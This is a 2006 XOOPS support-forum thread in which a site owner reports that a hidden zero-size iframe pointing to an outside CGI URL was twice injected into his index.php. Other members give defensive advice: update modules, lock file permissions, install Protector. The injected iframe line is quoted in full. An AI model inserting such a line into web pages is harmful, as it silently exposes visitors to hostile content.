1
wizanda
Been hacked direct to root index.php line added?
  • 2006/9/30 8:12

  • wizanda

  • Home away from home

  • Posts: 1585

  • Since: 2004/3/21


Ok twice now; first time i let it go yet shouldn't have!

Someone has been able to add this line direct to the end of my main index.php

<iframe src="http://sun-5.org/in.cgi?2" width=0px height=0px>iframe>


How did this happen and how can it be stopped?
Has anyone else seen anything like this or is it through some module I have ect?

2
davidl2
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 10:26

  • davidl2

  • XOOPS is my life!

  • Posts: 4843

  • Since: 2003/5/26


It's either been caused by an old module, an old XOOPS release - or by abuse from somewhere else on the server you use (ie - not XOOPS related).

What XOOPS release are you using, and which modules?

Hope you get it sorted... people who do this need a bit large pointy stick put somewhere very nasty.

3
wizanda
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 10:31

  • wizanda

  • Home away from home

  • Posts: 1585

  • Since: 2004/3/21


Thats why I did say may be me, a list of my modules, goes online painting system running in CGI and all the rest...so unsure how or where they would get into it to be able to do that?

Yet wouldn't surprise me on that system glad when we have shi-painter in XOOPS its self; then won't need it anymore...yet still best figure how they could..how would i start tracing something like that?

4
davidl2
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 10:35

  • davidl2

  • XOOPS is my life!

  • Posts: 4843

  • Since: 2003/5/26


What XOOPS release are you using, and which modules?

5
wizanda
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 10:44

  • wizanda

  • Home away from home

  • Posts: 1585

  • Since: 2004/3/21


lol u have to ask ....
Xoops 2.015
Article
CBB
Wiwimod
Zbible
Zscriptures
Quran
logical table checker
Smilez
Go
Znake
mydownloads
mylinks
sitemap
xmbmemberstats
Random quotes
Gabbly
Lace
Painting aka wakaba in Xoops
Guestmap
Multimenu
Comments
Polls
Tiny editor

6
davidl2
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 11:03

  • davidl2

  • XOOPS is my life!

  • Posts: 4843

  • Since: 2003/5/26


I think it may be worth checking Hervet's site for his MyDownloads - if you use the original

7
JCDunnart
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 11:06

  • JCDunnart

  • Not too shy to talk

  • Posts: 114

  • Since: 2006/7/1 5


Upload a clean index.php then set the file permission to read only (or CHMOD 644 for unix systems).

8
wizanda
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 11:09

  • wizanda

  • Home away from home

  • Posts: 1585

  • Since: 2004/3/21


possibly should add protector yet are there any plans to incude it in the core, if it is needed as i hear many recommending; yet was unsure if needed?
Yet given the amount of unorthordox ways i do things it may be worth while...

9
davidl2
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 11:16

  • davidl2

  • XOOPS is my life!

  • Posts: 4843

  • Since: 2003/5/26


Protector is always a good thing to add.... and I've been hacked in the past and regretted not having it there

Having it in the core is a bad idea, as it's quicker to update a module then wait for core releases - but it's certainly recommended with all new releases, i've noticed

10
wizanda
Re: Been hacked direct to root index.php line added?
  • 2006/9/30 11:43

  • wizanda

  • Home away from home

  • Posts: 1585

  • Since: 2004/3/21


well installed now...you know when you use a htaccess file can it just go in a module, so only that module has it on i.e the quran needs globals on yet the site don't?

Login

Who's Online

318 user(s) are online (241 user(s) are browsing Support Forums)


Members: 0


Guests: 318


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits